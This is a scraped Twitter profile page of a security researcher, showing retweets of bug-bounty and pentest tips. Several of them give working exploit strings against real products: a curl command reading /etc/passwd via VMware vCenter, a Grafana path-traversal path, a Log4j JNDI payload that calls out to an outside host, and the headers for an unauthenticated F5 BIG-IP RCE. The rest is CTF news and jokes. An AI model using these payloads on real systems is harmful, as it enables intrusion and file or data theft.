Mahmoud Barakat (@0xbarakat) 's Twitter Profile
Mahmoud Barakat

@0xbarakat

Student in the morning, Hacker at night. Opinions are my own.

ID: 3323775148

linkhttp://0xBarakat.me calendar_today13-06-2015 21:45:19

5,5K Tweet

2,2K Takipçi

955 Takip Edilen

Nuclei by ProjectDiscovery (@pdnuclei) 's Twitter Profile Photo

Nuclei Template for CVE-2021-22205 - GitLab CE/EE Unauthenticated RCE using ExifTool Template: github.com/projectdiscove… #bugbounty #pentest #hackwithautomation #gitlab

Nuclei Template for CVE-2021-22205 - GitLab CE/EE Unauthenticated RCE using ExifTool

Template: github.com/projectdiscove…

#bugbounty #pentest #hackwithautomation #gitlab
John Hammond (@_johnhammond) 's Twitter Profile Photo

🚨 BLACK FRIDAY SPECIAL 🚨 Today and today only, you can find all of my free education and content, online FOR FREE! After today's sale, everything will return to normal asking price: $0.00! 😱

HolyBugx (@holybugx) 's Twitter Profile Photo

Sometimes you need to be creative to bypass CORS mitigations and achieve a successful site-wide CSRF. Here is an example:

Sometimes you need to be creative to bypass CORS mitigations and achieve a successful site-wide CSRF.

Here is an example:
Black Hat MEA (@blackhatmea) 's Twitter Profile Photo

NEWS JUST IN: R3billions wins first place at #athackcon’s Capture the Flag! 🚩🙌 A huge thank you to all contestants! With teams from Saudi Arabia, the UAE, Poland, the USA and more - this truly has been EPIC.

NEWS JUST IN: R3billions wins first place at #athackcon’s Capture the Flag! 🚩🙌

A huge thank you to all contestants! With teams from Saudi Arabia, the UAE, Poland, the USA and more - this truly has been EPIC.
the_storm (@the_st0rm) 's Twitter Profile Photo

I honestly think r3billions is one of the best CTF teams in the middle east. This is great! but this is also an opportunity to be one of the best in the world :) Don't miss that opportunity ;)

RIVER (@wugeej) 's Twitter Profile Photo

VMware vCenter unauthorized arbitrary file read PoC working to Earlier versions (7.0.2.00100) [PoC] curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd" github.com/l0ggg/VMware_v…

VMware vCenter unauthorized arbitrary file read

PoC working to Earlier versions (7.0.2.00100) 

[PoC]
curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"

github.com/l0ggg/VMware_v…
Nicolas Krassas (@dinosn) 's Twitter Profile Photo

Seems like grafana's new LFI is at grafana-clock-panel plugin with a GET request, /public/plugins/grafana-clock-panel/../../../../../../../etc/passwd

Patrik Fehrenbach (@itsecurityguard) 's Twitter Profile Photo

trying to test every header of a website for #log4j? Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values: ${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io} now you know the vuln header :) #bugbounty #bugbountytips

trying to test every header of a website for #log4j?  Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values: 

${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io}

now you know the vuln header :) 

#bugbounty
#bugbountytips
Positive Security (@positive_sec) 's Twitter Profile Photo

Microsoft Teams: 1 feature, 4 vulnerabilities We stumbled upon several vulnerabilities in Team's link preview feature, out of which MS only fixed one so far. positive.security/blog/ms-teams-…

Jas502n (@jas502n) 's Twitter Profile Photo

#CVE-2022-1388 F5's BIG-IP Unauth RCE Connection: keep-alive, X-F5-Auth-Token Authorization: Basic YWRtaW46 X-F5-Auth-Token: anything https://x.x.x.x:443/mgmt/tm/util/bash

#CVE-2022-1388 F5's BIG-IP Unauth RCE

Connection: keep-alive, X-F5-Auth-Token
Authorization: Basic YWRtaW46
X-F5-Auth-Token: anything

https://x.x.x.x:443/mgmt/tm/util/bash
Flipper Zero (@flipper_zero) 's Twitter Profile Photo

DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS